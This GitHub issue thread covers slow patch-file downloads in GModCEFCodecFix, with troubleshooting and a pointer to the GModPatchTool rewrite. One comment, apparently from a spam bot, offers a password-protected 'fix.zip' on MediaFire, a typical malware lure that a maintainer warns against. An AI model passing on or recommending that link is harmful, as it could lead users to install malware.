Wow. This is actually the first time I see bots on github, hah Will a real human help, please?
Please don't download from any of the links they're sending. Someone will help when possible. I'm at work.

No worries, I can tell it's bots. Never witnessed something like this before! xD Good luck at work!
to fix your trouble try download this fix, i see it in another issue, https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme when you installing, you need to place a check in install to path and select "gcc."

All good, I'm sorry to hear what happened
Okay so, if it takes forever getting the remote version or downloading the patch files, it means your connection to GitHub is slow for some reason.
Could be general internet connection issues, or issues along the route between you and GitHub. Using a VPN might help, but other than that, not much can be done.

I'll try using warp-cli later and then update, hopefully it helps

Tried with WARP, it's the same. What the heck is wrong?
- everything else works well and is fast, including github itself
Hmmm. Maybe you have IPv6 enabled but your ISP doesn't support it/it isn't set up correctly?

No idea.. Is there some alternative way to install this? I don't mind if it's a little harder, I really want to get this working somehow, heh
You could manually download the repo and put the BSDIFF files in CEFCodecFix's cache folder for it to pick up. On Linux, that'll be $XDG_CACHE_HOME/GModCEFCodecFix/
This should be addressed somewhat by the rewrite, and the latest release: https://github.com/solsticegamestudios/GModPatchTool/releases
The rewrite automatically uses a backup web server if the tool can't connect to GitHub, or has errors while downloading the patch files.
Closing in favor of #185, since that refers to GModPatchTool's experience with this issue.
